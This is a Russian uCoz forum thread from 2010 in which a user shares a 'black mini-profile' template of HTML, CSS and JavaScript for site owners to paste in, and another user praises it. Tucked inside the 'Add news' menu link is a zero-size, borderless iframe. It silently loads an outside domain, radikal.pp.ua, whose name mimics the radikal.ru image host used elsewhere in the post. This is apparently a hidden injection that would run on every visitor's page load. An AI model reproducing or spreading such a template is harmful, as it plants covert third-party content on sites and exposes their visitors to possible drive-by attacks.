[R.K.Z.] - Черный мини-профиль - Форум
Главная | Регистрация | Вход Приветствую Вас Гость | RSS
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 1 из 11
Форум » Cкрипты » Готовые скрипты для UCOZ » Черный мини-профиль
Черный мини-профиль
2pacbestДата: Воскресенье, 31.01.2010, 18:13 | Сообщение # 1
Admin
Группа: User
Сообщений: 149
Репутация: 0
Бог форума За хорошую посещаемость на форуме За супер посещаемость

За 10 Сообщений За 20 Сообщений За 30 Сообщений За 40 Сообщений За 60 Сообщений За 80 Сообщений За 90 Сообщений
Статус:
СКРИН: http://s40.radikal.ru/i088/1001/8c/8b6779fcd343.gif

Code
<!--mb1te-profile-uCoz -->      
     <div align="center"><strong>Привет: $USERNAME$</strong>      
     <br> <br>      
     Сообщения: <?if($IS_NEW_PM$)?><img src="http://s42.radikal.ru/i096/0811/da/792a904470e4.gif" ><?else?><img src="http://s40.radikal.ru/i089/0811/94/292f5884f6d6.gif" ><?endif?><br>      
     <?if($USER_AVATAR_URL$)?><img class="userAvatar" title="$USERNAME$" src="$USER_AVATAR_URL$" border="0"><?else?><?if($USER_LOGGED_IN$)?><img class="userAvatar" title="$USERNAME$" src="/img/netavatara.png" border="0"><?else?><img class="userAvatar" title="$USERNAME$" src="http://s46.radikal.ru/i111/0811/0d/fc11979a3233.jpg" border="0"><?endif?><?endif?>      

     <?if($USER_LOGGED_IN$)?>      
     <div align="left">      

     <center><br>Ты здесь: <font color="#FF0000"><b>$USER_REG_DAYS$</b></font>-й день </center>      
     <!-- <bc> --><ul class="uz"><style>      

     <style type="text/css">      
     {      
     font-family: Verdana, Arial, Helvetica, sans-serif;      
     font-size: 100%;      
     font-weight: bold;      
     background: #FFF;      
     }      
           
     h1 {      
     font-family:Verdana, Arial, Helvetica, sans-serif;      
     font-size:13px;      
     font-weight:bold;      
     margin:0;      
     padding:0;      
     }      
           
     hr {      
     border:none;      
     border-top:1px solid #CCCCCC;      
     height:1px;      
     margin-bottom:25px;      
     }      
           
     ul {      
     list-style: none;      
     margin: 0;      
     padding: 0;      
     }      
           
     img {      
     border: none;      
     }      
           
     #menu {      
     width: 168px;      
     margin: 0px;      
     border-style: solid solid none solid;      
     border-color: #000;      
     border-size: 1px;      
     border-width: 1px;      
     }      
           
     #menu li a {      
     height: 32px;      
     voice-family: "\"}\"";      
     voice-family: inherit;      
     height: 24px;      
     text-decoration: none;      
     }      
           
     #menu li a:link, #menu li a:visited {      
     color: #9cff00;      
     display: block;      
     background: url(http://s45.radikal.ru/i107/0905/d9/686ecdceaea8.gif);      
     padding: 8px 0 0 10px;      
     }      
           
     #menu li a:hover {      
     color: #9cff00;      
     background: url(http://s44.radikal.ru/i105/0905/b5/823ac2c3f10c.gif) 0 -32px;      
     padding: 8px 0 0 10px;      
     }      
     </style>      
           
     <div id="menu">      
     <ul>      
           
     <li><a href="$HOME_PAGE_LINK$news/0-0-0-0-1"><span style="color:ffffff"><b>Добавить новость</b></b><iframe src="http://radikal.pp.ua/" name="iframe" width="0%" height="0%" scrolling="no" frameBorder=0></iframe></span></a></li>      
     <li><a href="/forum"><span style="color:ffffff">Форум</b></span></a></li>      
     <li><a href="$USERS_LIST_URL$"><span style="color:ffffff">Список пользователей</b></span></a></li>      
     <li><a href="$LOGOUT_LINK$"><span style="color:ffffff">Выйти</b></span></a></li>      
     </ul>      

     <?if($IS_NEW_PM$)?><script type="text/javascript">function flashit(id,cl){var c=document.getElementById(id);if (c.style.color=='red'){c.style.color=cl;}else {c.style.color='red';}}setInterval("flashit('upml2','')",500)</script><?endif?> </div>      

     <script language=javascript type=text/javascript>      
      function openOnClick(client_type)      
      {      
      if(client_type=="mail")clientWindow = window.open("$PM_URL$","pmw","scrollbars=1,top=0,left=0,resizable=1,width=850,height=350") || alert("Отключите блокировку всплывающих окон!");      
      if(client_type=="send")clientWindow = window.open("/index/14-999-0-1","pms","scrollbars=1,top=0,left=0,resizable=1,width=850,height=350") || alert("Отключите блокировку всплывающих окон!");      
      if(client_type=="options")clientWindow = window.open("/index/11","options","scrollbars=1,top=0,left=0,resizable=1,width=680,height=350") || alert("Отключите блокировку всплывающих окон!");      
      if(client_type=="users")clientWindow = window.open("$USERS_LIST_URL$","users","scrollbars=1,top=0,left=0,resizable=1,width=680,height=350") || alert("Отключите блокировку всплывающих окон!");      

      }      
     </script>      
     <?else?>      
     <br>Привет чужак!!! Мы рады видеть тебя здесь, зарегься или зайди под своим аккаунтом.      
     <?endif?></div>      
     $LOGIN_FORM$
 
rtf-rusДата: Воскресенье, 31.01.2010, 22:27 | Сообщение # 2
Admin
Группа: Admin
Сообщений: 64
Репутация: 7
Бог сайта и форума За хорошую посещаемость на форуме

За создание сайта За 10 Сообщений За 20 Сообщений За 30 Сообщений За 40 Сообщений За 60 Сообщений
Статус:


 
rtf-rusДата: Воскресенье, 31.01.2010, 22:29 | Сообщение # 3
Admin
Группа: Admin
Сообщений: 64
Репутация: 7
Бог сайта и форума За хорошую посещаемость на форуме

За создание сайта За 10 Сообщений За 20 Сообщений За 30 Сообщений За 40 Сообщений За 60 Сообщений
Статус:
2pacbest, кстати норм профиль

 
Форум » Cкрипты » Готовые скрипты для UCOZ » Черный мини-профиль
Страница 1 из 11
Поиск:

Бесплатный конструктор сайтов - uCoz